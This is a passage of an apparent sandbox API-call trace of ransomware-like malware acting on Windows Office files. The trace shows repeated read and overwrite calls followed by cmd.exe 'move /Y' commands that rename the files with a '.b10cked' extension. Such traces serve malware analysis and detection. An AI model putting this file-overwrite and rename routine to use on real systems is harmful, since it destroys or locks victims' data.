hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7b60 [0168.135] WriteFile (in: 
hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.135] CloseHandle (hObject=0x114) returned 1 [0168.274] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX") returned 0x3c [0168.275] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.275] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x888, dwThreadId=0x898)) returned 1 [0168.295] CloseHandle (hObject=0x1b4) returned 1 [0168.295] CloseHandle (hObject=0x114) returned 1 [0168.296] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.296] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.296] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.296] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22508586466) returned 1 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3d478 [0168.298] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d960 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d960 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.339] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.339] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.412] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.433] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0168.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, 
lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0168.441] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0168.441] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.441] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.471] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0168.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0168.472] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.473] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.473] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, 
lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0168.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0168.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0168.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d960 [0168.480] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.480] CloseHandle (hObject=0x114) returned 1 [0168.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX") returned 0x3c [0168.483] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.483] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfcc, dwThreadId=0x9d8)) returned 1 [0168.485] CloseHandle (hObject=0x1b4) returned 1 [0168.485] CloseHandle (hObject=0x114) returned 1 [0168.485] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.485] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.485] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] CreateFileW (lpFileName="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22527512063) returned 1 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.488] SetFilePointer 